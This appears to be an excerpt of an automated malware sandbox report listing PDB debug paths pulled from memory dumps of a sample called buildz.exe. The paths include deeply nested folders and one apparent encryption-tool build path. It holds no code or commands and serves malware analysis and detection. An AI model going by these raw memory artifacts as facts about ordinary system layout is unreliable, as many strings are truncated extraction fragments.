          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\2 source: buildz.exe, 00000006.00000003.2927908987.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2918151256.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917779893.0000000003949000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917318091.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\} source: buildz.exe, 00000006.00000003.2908778230.0000000003A5A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2918151256.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917779893.0000000003949000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917318091.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2920284157.0000000003A5B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*e\AR source: buildz.exe, 00000006.00000003.2902921961.0000000003796000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2909511400.000000000379F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\s\alf< source: buildz.exe, 00000006.00000003.2941175800.0000000003862000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.qual\ source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ta\ source: buildz.exe, 00000006.00000003.2935890932.00000000038AC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\gMR source: buildz.exe, 00000006.00000003.2829983704.000000000312A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\+ source: buildz.exe, 00000006.00000003.2911050462.0000000003701000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2921149380.0000000003702000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2439164862.0000000003146000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2929777175.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2490478427.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2866758779.00000000006EE000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2904037838.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2505810794.000000000315E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2504691310.0000000003147000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790715990.00000000006EE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: buildz.exe, 00000006.00000003.2865110592.00000000039BC000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2902251241.0000000003989000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2904082392.0000000003990000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2901206490.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\G source: buildz.exe, 00000006.00000003.2927908987.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917779893.0000000003A65000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2920284157.0000000003A65000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2929916256.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2928147752.0000000003A3B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\y\\ source: buildz.exe, 00000006.00000003.2818268336.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2831789553.0000000003105000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: buildz.exe, 00000006.00000003.2934199949.0000000003A8F000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2927908987.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2929916256.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2928147752.0000000003A3B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\gs\0 source: buildz.exe, 00000006.00000003.2829769340.0000000003863000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2863908883.00000000038BD000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2865764068.00000000038C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: buildz.exe, 00000006.00000003.2865110592.00000000039BC000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2902251241.0000000003989000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2904082392.0000000003990000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2901206490.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: buildz.exe, 00000006.00000003.2725563548.0000000003146000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726652522.0000000003177000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726101777.0000000003175000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789829817.000000000315E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790348604.0000000003191000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: buildz.exe, 00000006.00000003.2863127221.0000000003175000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2902662689.000000000385F000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2866705786.000000000385D000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2862740588.0000000003156000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\d source: buildz.exe, 00000006.00000003.2829091548.0000000003163000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2830232221.000000000316F000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2830146833.0000000003169000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: buildz.exe, 00000006.00000003.2726243486.000000000313B000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725563548.000000000311A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725945284.000000000312E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: buildz.exe, 00000006.00000003.2726779941.000000000310A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726199726.00000000030FC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\I source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\40\ source: buildz.exe, 00000006.00000003.2504748326.0000000003105000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2434628314.00000000030FC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.qual= source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ^ottings\Application Data\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2935157500.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2940580661.00000000006EE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: buildz.exe, 00000006.00000003.2830683737.00000000038F1000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2831125784.0000000003909000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2819742747.0000000003125000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2817731295.0000000003125000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2913018293.0000000003151000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2912099510.000000000314F000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2903790233.0000000003130000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2911709152.0000000003127000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\c source: buildz.exe, 00000006.00000003.2865554104.0000000003127000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2829983704.000000000312A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2872932828.0000000003133000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2866166474.000000000312C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790917732.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790773651.00000000037A7000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789619660.000000000373E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790278127.000000000378D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\P source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\40\3 source: buildz.exe, 00000006.00000003.2439164862.0000000003146000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2505810794.000000000315E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2504691310.0000000003147000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\94\bwe\ source: buildz.exe, 00000006.00000003.2941175800.0000000003862000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*st\ source: buildz.exe, 00000006.00000003.2818268336.00000000030FC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\N source: buildz.exe, 00000006.00000003.2789619660.0000000003701000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2816935337.000000000370C000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2819426188.000000000370C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.qualj source: buildz.exe, 00000006.00000003.2726199726.00000000030FC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\@ source: buildz.exe, 00000006.00000003.2908778230.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2910039214.00000000039B9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\1 source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2504748326.0000000003105000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2434628314.00000000030FC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ion source: buildz.exe, 00000006.00000003.2789619660.0000000003701000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\input\it-IT\od.pdb source: buildz.exe, 00000006.00000003.2790773651.00000000037A7000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789619660.000000000373E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790278127.000000000378D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\+~\0* source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790773651.00000000037A7000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789619660.000000000373E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790278127.000000000378D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\871\ source: buildz.exe, 00000006.00000003.2942712973.0000000003948000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2934520323.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2938642063.0000000003948000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2935260210.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\40\\ source: buildz.exe, 00000006.00000003.2940468429.000000000371C000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2939266286.0000000003716000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb023__16_5_0.txt5 source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: on Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tion x% source: buildz.exe, 00000006.00000003.2943472927.000000000319D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Cef\ source: buildz.exe, 00000006.00000003.2918151256.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917779893.0000000003949000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917318091.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tion x% source: buildz.exe, 00000006.00000003.2939681411.0000000003183000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2941052556.000000000318D000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2940550146.000000000318A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\wy\licat source: buildz.exe, 00000006.00000003.2939681411.0000000003183000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2941052556.000000000318D000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2940550146.000000000318A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.qual0 source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\bdl source: buildz.exe, 00000006.00000003.2940073344.0000000003122000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\6 source: buildz.exe, 00000006.00000003.2934199949.0000000003A8F000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2929916256.0000000003ACE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\h]b source: buildz.exe, 00000006.00000003.2923364119.0000000003894000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2921747747.0000000003894000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\bat\/s source: buildz.exe, 00000006.00000003.2789952289.000000000312C000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725563548.000000000311A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725945284.000000000312E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726806827.0000000003133000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\\ source: buildz.exe, 00000006.00000003.2862884763.0000000003788000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2872802635.0000000003794000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ogs\ source: buildz.exe, 00000006.00000003.2902251241.0000000003989000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2904082392.0000000003990000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2901206490.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: buildz.exe, 00000006.00000003.2789829817.000000000315E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\8Y source: buildz.exe, 00000006.00000003.2923364119.0000000003894000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2921747747.0000000003894000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCache\IE\53IVYM2Y\d.pdb\ source: buildz.exe, 00000006.00000003.2935552901.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2943688731.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2935479787.0000000003A23000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\AC\6q source: buildz.exe, 00000006.00000003.2927908987.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2928758672.0000000003A0B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\1d source: buildz.exe, 00000006.00000003.2935890932.00000000038AC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tate\.9 source: buildz.exe, 00000006.00000003.2911050462.0000000003701000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2921149380.0000000003702000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\:Rq source: buildz.exe, 00000006.00000003.2830036710.000000000310F000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2865554104.000000000311E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2831965794.0000000003114000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tate\ source: buildz.exe, 00000006.00000003.2818836526.0000000003747000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789619660.000000000373E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2818383250.0000000003746000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790551029.000000000374A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\H source: buildz.exe, 00000006.00000003.2927908987.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917779893.0000000003A65000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2920284157.0000000003A65000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2929916256.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2928147752.0000000003A3B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\IqY source: buildz.exe, 00000006.00000003.2819183904.000000000388C000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789445333.000000000388C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.qualw source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: buildz.exe, buildz.exe, 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 00000006.00000002.2948785389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 00000008.00000002.2313819573.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 0000000A.00000002.2325833374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 0000000B.00000002.2426701504.0000000002260000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 0000000C.00000002.2435292672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\{ J source: buildz.exe, 00000006.00000003.2908778230.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2910039214.00000000039B9000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2912783913.0000000003A0B000.00000004.00000020.00020000.00000000.sdmp
